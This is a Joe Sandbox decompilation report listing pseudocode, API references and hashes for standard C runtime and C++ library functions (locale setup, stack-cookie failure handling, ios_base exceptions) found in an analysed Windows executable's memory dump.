                                                                                                                                                                                                        					_v20 = __eax;
                                                                                                                                                                                                        					_t142 = E004117D0(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
                                                                                                                                                                                                        					_t145 = E004117D0(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
                                                                                                                                                                                                        					_t148 = E004117D0(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
                                                                                                                                                                                                        					_t151 = E004117D0(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
                                                                                                                                                                                                        					_t154 = E004117D0(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
                                                                                                                                                                                                        					_t157 = E004117D0(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
                                                                                                                                                                                                        					_t159 = E004117D0(_t279,  &_v20, 1, _v8, 0x37, __esi);
                                                                                                                                                                                                        					_t162 = E004117D0(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
                                                                                                                                                                                                        					_t165 = E004117D0(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
                                                                                                                                                                                                        					_t168 = E004117D0(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
                                                                                                                                                                                                        					_t171 = E004117D0(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
                                                                                                                                                                                                        					_t174 = E004117D0(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
                                                                                                                                                                                                        					_t177 = E004117D0(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
                                                                                                                                                                                                        					_t180 = E004117D0(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
                                                                                                                                                                                                        					_t183 = E004117D0(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
                                                                                                                                                                                                        					_t186 = E004117D0(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
                                                                                                                                                                                                        					_t189 = E004117D0(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
                                                                                                                                                                                                        					_t192 = E004117D0(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
                                                                                                                                                                                                        					_t195 = E004117D0(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
                                                                                                                                                                                                        					_t198 = E004117D0(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
                                                                                                                                                                                                        					_t201 = E004117D0(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
                                                                                                                                                                                                        					_t204 = E004117D0(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
                                                                                                                                                                                                        					_t207 = E004117D0(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
                                                                                                                                                                                                        					_t210 = E004117D0(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
                                                                                                                                                                                                        					_t213 = E004117D0(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
                                                                                                                                                                                                        					_t216 = E004117D0(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
                                                                                                                                                                                                        					_t219 = E004117D0(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
                                                                                                                                                                                                        					_t222 = E004117D0(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
                                                                                                                                                                                                        					_t225 = E004117D0(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
                                                                                                                                                                                                        					_t228 = E004117D0(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
                                                                                                                                                                                                        					_t231 = E004117D0(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
                                                                                                                                                                                                        					_t234 = E004117D0(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
                                                                                                                                                                                                        					_t237 = E004117D0(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
                                                                                                                                                                                                        					_t240 = E004117D0(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
                                                                                                                                                                                                        					_t243 = E004117D0(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
                                                                                                                                                                                                        					_t246 = E004117D0(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
                                                                                                                                                                                                        					_t249 = E004117D0(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
                                                                                                                                                                                                        					_t252 = E004117D0(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
                                                                                                                                                                                                        					_t255 = E004117D0(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
                                                                                                                                                                                                        					_t258 = E004117D0(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
                                                                                                                                                                                                        					_t261 = E004117D0(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
                                                                                                                                                                                                        					_t264 = E004117D0(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
                                                                                                                                                                                                        					_t267 = E004117D0(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
                                                                                                                                                                                                        					_t276 = _v12;
                                                                                                                                                                                                        					_t270 = E004117D0(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
                                                                                                                                                                                                        					 *(__esi + 0xac) = _t276;
                                                                                                                                                                                                        					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return __eax | 0xffffffff;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}




















































                                                                                                                                                                                                        0x0040fade
                                                                                                                                                                                                        0x0040faf3
                                                                                                                                                                                                        0x0040fb08
                                                                                                                                                                                                        0x0040fb20
                                                                                                                                                                                                        0x0040fb35
                                                                                                                                                                                                        0x0040fb4a
                                                                                                                                                                                                        0x0040fb5f
                                                                                                                                                                                                        0x0040fb77
                                                                                                                                                                                                        0x0040fb8c
                                                                                                                                                                                                        0x0040fba1
                                                                                                                                                                                                        0x0040fbb6
                                                                                                                                                                                                        0x0040fbce
                                                                                                                                                                                                        0x0040fbe3
                                                                                                                                                                                                        0x0040fbf8
                                                                                                                                                                                                        0x0040fc0d
                                                                                                                                                                                                        0x0040fc25
                                                                                                                                                                                                        0x0040fc3a
                                                                                                                                                                                                        0x0040fc4f
                                                                                                                                                                                                        0x0040fc64
                                                                                                                                                                                                        0x0040fc7f
                                                                                                                                                                                                        0x0040fc97
                                                                                                                                                                                                        0x0040fcaf
                                                                                                                                                                                                        0x0040fcc7
                                                                                                                                                                                                        0x0040fce2
                                                                                                                                                                                                        0x0040fcfa
                                                                                                                                                                                                        0x0040fd12
                                                                                                                                                                                                        0x0040fd2a
                                                                                                                                                                                                        0x0040fd45
                                                                                                                                                                                                        0x0040fd5d
                                                                                                                                                                                                        0x0040fd78
                                                                                                                                                                                                        0x0040fd8b
                                                                                                                                                                                                        0x0040fd95
                                                                                                                                                                                                        0x0040fda2
                                                                                                                                                                                                        0x0040fdaa
                                                                                                                                                                                                        0x0040f9aa
                                                                                                                                                                                                        0x0040f9ae
                                                                                                                                                                                                        0x0040f9ae

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ___getlocaleinfo
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1937885557-0
                                                                                                                                                                                                        • Opcode ID: cd71842d4e99d40a02c7e0779aca8632662b8e4ceae5cd7a16824908425c8851
                                                                                                                                                                                                        • Instruction ID: 2dc00d7319210ed8a052a58aa979d3e3da7b24fb00a99161b3b7a16fadde738a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd71842d4e99d40a02c7e0779aca8632662b8e4ceae5cd7a16824908425c8851
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28E1DEB290020DBEEF12DBF28C41DFF77BDEB04788F14052BB21593591EA74AA459764
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                                                        			E00406CDA(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                                                        				intOrPtr _v0;
                                                                                                                                                                                                        				void* _v804;
                                                                                                                                                                                                        				intOrPtr _v808;
                                                                                                                                                                                                        				intOrPtr _v812;
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				intOrPtr _t11;
                                                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                                                        				intOrPtr _t13;
                                                                                                                                                                                                        				long _t17;
                                                                                                                                                                                                        				intOrPtr _t21;
                                                                                                                                                                                                        				intOrPtr _t22;
                                                                                                                                                                                                        				intOrPtr _t25;
                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                        				intOrPtr _t27;
                                                                                                                                                                                                        				intOrPtr* _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t27 = __esi;
                                                                                                                                                                                                        				_t26 = __edi;
                                                                                                                                                                                                        				_t25 = __edx;
                                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                                        				_t21 = __ebx;
                                                                                                                                                                                                        				_t6 = __eax;
                                                                                                                                                                                                        				_t34 = _t22 -  *0x4294d0; // 0x5210f904
                                                                                                                                                                                                        				if(_t34 == 0) {
                                                                                                                                                                                                        					asm("repe ret");
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *0x42ae80 = _t6;
                                                                                                                                                                                                        				 *0x42ae7c = _t22;
                                                                                                                                                                                                        				 *0x42ae78 = _t25;
                                                                                                                                                                                                        				 *0x42ae74 = _t21;
                                                                                                                                                                                                        				 *0x42ae70 = _t27;
                                                                                                                                                                                                        				 *0x42ae6c = _t26;
                                                                                                                                                                                                        				 *0x42ae98 = ss;
                                                                                                                                                                                                        				 *0x42ae8c = cs;
                                                                                                                                                                                                        				 *0x42ae68 = ds;
                                                                                                                                                                                                        				 *0x42ae64 = es;
                                                                                                                                                                                                        				 *0x42ae60 = fs;
                                                                                                                                                                                                        				 *0x42ae5c = gs;
                                                                                                                                                                                                        				asm("pushfd");
                                                                                                                                                                                                        				_pop( *0x42ae90);
                                                                                                                                                                                                        				 *0x42ae84 =  *_t31;
                                                                                                                                                                                                        				 *0x42ae88 = _v0;
                                                                                                                                                                                                        				 *0x42ae94 =  &_a4;
                                                                                                                                                                                                        				 *0x42add0 = 0x10001;
                                                                                                                                                                                                        				_t11 =  *0x42ae88; // 0x0
                                                                                                                                                                                                        				 *0x42ad84 = _t11;
                                                                                                                                                                                                        				 *0x42ad78 = 0xc0000409;
                                                                                                                                                                                                        				 *0x42ad7c = 1;
                                                                                                                                                                                                        				_t12 =  *0x4294d0; // 0x5210f904
                                                                                                                                                                                                        				_v812 = _t12;
                                                                                                                                                                                                        				_t13 =  *0x4294d4; // 0xadef06fb
                                                                                                                                                                                                        				_v808 = _t13;
                                                                                                                                                                                                        				 *0x42adc8 = IsDebuggerPresent();
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				E0040BABC(_t14);
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                        				_t17 = UnhandledExceptionFilter(0x422c48);
                                                                                                                                                                                                        				if( *0x42adc8 == 0) {
                                                                                                                                                                                                        					_push(1);
                                                                                                                                                                                                        					E0040BABC(_t17);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x0040e1dd
                                                                                                                                                                                                        0x0040e1de
                                                                                                                                                                                                        0x0040e1e7
                                                                                                                                                                                                        0x0040e1ef
                                                                                                                                                                                                        0x0040e1f7
                                                                                                                                                                                                        0x0040e202
                                                                                                                                                                                                        0x0040e20c
                                                                                                                                                                                                        0x0040e211
                                                                                                                                                                                                        0x0040e216
                                                                                                                                                                                                        0x0040e220
                                                                                                                                                                                                        0x0040e22a
                                                                                                                                                                                                        0x0040e22f
                                                                                                                                                                                                        0x0040e235
                                                                                                                                                                                                        0x0040e23a
                                                                                                                                                                                                        0x0040e246
                                                                                                                                                                                                        0x0040e24b
                                                                                                                                                                                                        0x0040e24d
                                                                                                                                                                                                        0x0040e255
                                                                                                                                                                                                        0x0040e260
                                                                                                                                                                                                        0x0040e26d
                                                                                                                                                                                                        0x0040e26f
                                                                                                                                                                                                        0x0040e271
                                                                                                                                                                                                        0x0040e276
                                                                                                                                                                                                        0x0040e28a

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0040E240
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040E255
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(00422C48), ref: 0040E260
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0040E27C
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 0040E283
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2579439406-0
                                                                                                                                                                                                        • Opcode ID: 2c160fe2d0bd155fe53703cdc8561db83c61f5e7d2f38b6c03a32e9dc59577ee
                                                                                                                                                                                                        • Instruction ID: b5f64f73f4b48003aa6180a0c0465cf0f21f2e2bac6e42e0dac37edd9f478c2f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c160fe2d0bd155fe53703cdc8561db83c61f5e7d2f38b6c03a32e9dc59577ee
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A21CDB5A903049FD720DF25ED45A443BA5FB58305FD6047AE809976B0E7B498A3CF0E
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E0040B596(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				struct HINSTANCE__* _t23;
                                                                                                                                                                                                        				intOrPtr _t28;
                                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                                        				intOrPtr _t45;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t35 = __ebx;
                                                                                                                                                                                                        				_push(0xc);
                                                                                                                                                                                                        				_push(0x424ff8);
                                                                                                                                                                                                        				E0040D294(__ebx, __edi, __esi);
                                                                                                                                                                                                        				_t44 = L"KERNEL32.DLL";
                                                                                                                                                                                                        				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                                                                                                                                                        				if(_t23 == 0) {
                                                                                                                                                                                                        					_t23 = E0040C4DB(_t44);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *(_t46 - 0x1c) = _t23;
                                                                                                                                                                                                        				_t45 =  *((intOrPtr*)(_t46 + 8));
                                                                                                                                                                                                        				 *((intOrPtr*)(_t45 + 0x5c)) = 0x422bd0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                                                                                                                                                                                                        				if(_t23 != 0) {
                                                                                                                                                                                                        					_t35 = GetProcAddress;
                                                                                                                                                                                                        					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                                                                                                                                                                                                        					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                                                                                                                                                                                                        				 *((char*)(_t45 + 0xc8)) = 0x43;
                                                                                                                                                                                                        				 *((char*)(_t45 + 0x14b)) = 0x43;
                                                                                                                                                                                                        				 *(_t45 + 0x68) = 0x429920;
                                                                                                                                                                                                        				E0040D68E(_t35, 0xd);
                                                                                                                                                                                                        				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                                                                                                                                                                                                        				InterlockedIncrement( *(_t45 + 0x68));
                                                                                                                                                                                                        				 *(_t46 - 4) = 0xfffffffe;
                                                                                                                                                                                                        				E0040B66B();
                                                                                                                                                                                                        				E0040D68E(_t35, 0xc);
                                                                                                                                                                                                        				 *(_t46 - 4) = 1;
                                                                                                                                                                                                        				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                                                                                                                                                                                                        				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					_t32 =  *0x429610; // 0x20310f8
                                                                                                                                                                                                        					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00408ABA( *((intOrPtr*)(_t45 + 0x6c)));
                                                                                                                                                                                                        				 *(_t46 - 4) = 0xfffffffe;
                                                                                                                                                                                                        				return E0040D2D9(E0040B674());
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00424FF8,0000000C,0040B6D1,00000000,00000000,?,?,00409A29,00406CC3,?,0040121A,?,?), ref: 0040B5A8
                                                                                                                                                                                                        • __crt_waiting_on_module_handle.LIBCMT ref: 0040B5B3
                                                                                                                                                                                                          • Part of subcall function 0040C4DB: Sleep.KERNEL32(000003E8,00000000,?,0040B4F9,KERNEL32.DLL,?,0040B545,?,?,00409A29,00406CC3,?,0040121A,?,?), ref: 0040C4E7
                                                                                                                                                                                                          • Part of subcall function 0040C4DB: GetModuleHandleW.KERNEL32(00000010,?,0040B4F9,KERNEL32.DLL,?,0040B545,?,?,00409A29,00406CC3,?,0040121A,?,?), ref: 0040C4F0
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040B5DC
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040B5EC
                                                                                                                                                                                                        • __lock.LIBCMT ref: 0040B60E
                                                                                                                                                                                                        • InterlockedIncrement.KERNEL32(00429920), ref: 0040B61B
                                                                                                                                                                                                        • __lock.LIBCMT ref: 0040B62F
                                                                                                                                                                                                        • ___addlocaleref.LIBCMT ref: 0040B64D
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                        • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                                                                        • API String ID: 1028249917-2843748187
                                                                                                                                                                                                        • Opcode ID: 9c980524b17fc86cf85f711787712c9bf7a11e1b4ad13a4453ea5275dfae2e02
                                                                                                                                                                                                        • Instruction ID: 1304dc8a5914f9468177ce493641d3e66e8ae9b94de506574f4b097bf1d59058
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c980524b17fc86cf85f711787712c9bf7a11e1b4ad13a4453ea5275dfae2e02
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C311C371A40701EED7209F769901B4ABBE0EF04318F50896FE499A33E1CB789A41CF5D
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0041D720(intOrPtr __ecx, signed int _a4, signed char _a8) {
                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                        				char _v72;
                                                                                                                                                                                                        				char _v112;
                                                                                                                                                                                                        				char _v140;
                                                                                                                                                                                                        				char _v180;
                                                                                                                                                                                                        				char _v208;
                                                                                                                                                                                                        				intOrPtr _v212;
                                                                                                                                                                                                        				intOrPtr _t35;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v212 = __ecx;
                                                                                                                                                                                                        				 *(_v212 + 8) = _a4 & 0x00000017;
                                                                                                                                                                                                        				_t35 = _v212;
                                                                                                                                                                                                        				if(( *(_v212 + 8) &  *(_t35 + 0xc)) != 0) {
                                                                                                                                                                                                        					if((_a8 & 0x000000ff) == 0) {
                                                                                                                                                                                                        						if(( *(_v212 + 8) &  *(_v212 + 0xc) & 0x00000004) == 0) {
                                                                                                                                                                                                        							if(( *(_v212 + 8) &  *(_v212 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                        								E00401030( &_v208, "ios_base::eofbit set");
                                                                                                                                                                                                        								E0041D850( &_v180,  &_v208);
                                                                                                                                                                                                        								E00404EFB( &_v180, 0x4246a0);
                                                                                                                                                                                                        								return E00401070( &_v208);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							E00401030( &_v140, "ios_base::failbit set");
                                                                                                                                                                                                        							E0041D850( &_v112,  &_v140);
                                                                                                                                                                                                        							E00404EFB( &_v112, 0x4246a0);
                                                                                                                                                                                                        							return E00401070( &_v140);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						E00401030( &_v72, "ios_base::badbit set");
                                                                                                                                                                                                        						E0041D850( &_v44,  &_v72);
                                                                                                                                                                                                        						E00404EFB( &_v44, 0x4246a0);
                                                                                                                                                                                                        						return E00401070( &_v72);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return E00404EFB(0, 0);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t35;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0041D763
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Exception@8Throw
                                                                                                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                        • API String ID: 2005118841-1866435925
                                                                                                                                                                                                        • Opcode ID: f51be20ae302ea12bd661d7dcf9924b2bfb1dd704e12457a6a10e2975fdb30af
                                                                                                                                                                                                        • Instruction ID: 44e9582298f91dd78c73d7226bc2d4a95d49aa97c317b43de97af70f507a8f29
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f51be20ae302ea12bd661d7dcf9924b2bfb1dd704e12457a6a10e2975fdb30af
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F315C719102688BCB14FB50DC92FE9B334BB54304F5481ABE05937695DB386E85CF68
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E004039C9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                        				intOrPtr _t18;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        				intOrPtr _t43;
                                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t29 = __ebx;
                                                                                                                                                                                                        				_push(0x14);
                                                                                                                                                                                                        				E00406CE9(E00417316, __ebx, __edi, __esi);
                                                                                                                                                                                                        				E00403BDD(_t44 - 0x14, 0);
                                                                                                                                                                                                        				_t43 =  *0x42a40c; // 0x0
                                                                                                                                                                                                        				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
                                                                                                                                                                                                        				_t17 = E0041E070(0x42a49c);
                                                                                                                                                                                                        				_t32 =  *((intOrPtr*)(_t44 + 8));
                                                                                                                                                                                                        				_t18 = E0041E0E0( *((intOrPtr*)(_t44 + 8)), _t17);
                                                                                                                                                                                                        				_t41 = _t18;
                                                                                                                                                                                                        				if(_t18 == 0) {
                                                                                                                                                                                                        					if(_t43 == 0) {
                                                                                                                                                                                                        						_push( *((intOrPtr*)(_t44 + 8)));
                                                                                                                                                                                                        						_push(_t44 - 0x10);
                                                                                                                                                                                                        						_t23 = E00403847(__ebx, _t32, _t41, _t43, __eflags);
                                                                                                                                                                                                        						__eflags = _t23 - 0xffffffff;
                                                                                                                                                                                                        						if(_t23 == 0xffffffff) {
                                                                                                                                                                                                        							E00405099(_t44 - 0x20, "bad cast");
                                                                                                                                                                                                        							E00404EFB(_t44 - 0x20, 0x424900);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t41 =  *((intOrPtr*)(_t44 - 0x10));
                                                                                                                                                                                                        						 *0x42a40c =  *((intOrPtr*)(_t44 - 0x10));
                                                                                                                                                                                                        						E0041D490( *((intOrPtr*)(_t44 - 0x10)));
                                                                                                                                                                                                        						E00403EA2(_t29, _t39, _t41, _t41);
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t41 = _t43;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
                                                                                                                                                                                                        				E00403C05(_t44 - 0x14);
                                                                                                                                                                                                        				return E00406D88(_t41);
                                                                                                                                                                                                        			}










                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 004039D0
                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004039DA
                                                                                                                                                                                                        • int.LIBCPMTD ref: 004039F1
                                                                                                                                                                                                          • Part of subcall function 0041E070: std::_Lockit::_Lockit.LIBCPMT ref: 0041E086
                                                                                                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 004039FA
                                                                                                                                                                                                        • codecvt.LIBCPMT ref: 00403A14
                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00403A28
                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00403A36
                                                                                                                                                                                                        • std::locale::facet::_Incref.LIBCPMTD ref: 00403A46
                                                                                                                                                                                                        • std::locale::facet::facet_Register.LIBCPMT ref: 00403A4C
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
